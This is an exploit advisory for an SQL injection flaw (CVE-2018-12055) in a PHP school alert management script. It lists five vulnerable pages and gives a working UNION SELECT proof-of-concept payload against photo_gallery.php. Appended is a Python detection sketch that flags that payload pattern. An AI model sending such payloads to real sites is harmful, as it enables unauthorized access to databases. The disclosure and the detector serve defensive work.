Description
=================
Schools Alert Management Script - SQL Injections
Date: 07.06.2018
Vendor Homepage: https://www.phpscriptsmall.com/
Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
Category: Web Application
Exploit Author: xiaotian.wang From DBAppSecurity
Tested on: Linux Mint
CVE: CVE-2018-12055
=================
Vulnerable cgi:
- contact_us.php
- faq.php
- about.php
- photo_gallery.php
- privacy.php
=================
Proof of Concept:
POST http://localhost/[PATH]/photo_gallery.php
DATA xxx'/**/union/**/all/**/select/**/1,user(),3,4#
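
A detection sketch for the pattern in the proof of concept above, added here as an example and not part of the original report or the vendor's code: it URL-decodes a request body, replaces SQL inline comments (`/**/`, used in the PoC in place of spaces) with whitespace, and flags `UNION [ALL] SELECT` on the scripts listed as vulnerable. The function names, the `/app/` path prefix and the benign sample are assumptions constructed for illustration.

```python
import re
from urllib.parse import quote, unquote_plus

# Scripts listed as vulnerable in the advisory.
AFFECTED = {"contact_us.php", "faq.php", "about.php",
            "photo_gallery.php", "privacy.php"}

_INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # /**/ standing in for a space
_UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b", re.I)

def normalize(value: str) -> str:
    """URL-decode (up to 3 rounds, for double encoding), turn inline SQL
    comments into spaces, and collapse runs of whitespace."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = _INLINE_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value)

def is_suspicious(path: str, body: str) -> bool:
    """True when a request to an affected script carries UNION SELECT in its
    query string or body once comment-based spacing is normalized."""
    base, _, query = path.partition("?")
    if base.rsplit("/", 1)[-1] not in AFFECTED:
        return False
    return any(_UNION_SELECT.search(normalize(part)) for part in (query, body))

# The PoC body from the report, and the same bytes as they would look URL-encoded.
POC = "xxx'/**/union/**/all/**/select/**/1,user(),3,4#"
POC_ENCODED = quote(POC, safe="")

# Constructed sample requests: (path, body).
SAMPLES = [
    ("/app/photo_gallery.php", POC),
    ("/app/photo_gallery.php", POC_ENCODED),
    ("/app/contact_us.php", "name=Student+Union&msg=please+select+a+date"),
    ("/app/index.php", POC),  # script not in the advisory's list
]

def scan(samples):
    """Return the verdict for each sample, in order."""
    return [is_suspicious(path, body) for path, body in samples]

if __name__ == "__main__":
    for (path, body), hit in zip(SAMPLES, scan(SAMPLES)):
        print("ALERT" if hit else "ok   ", path, body[:40])
```
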
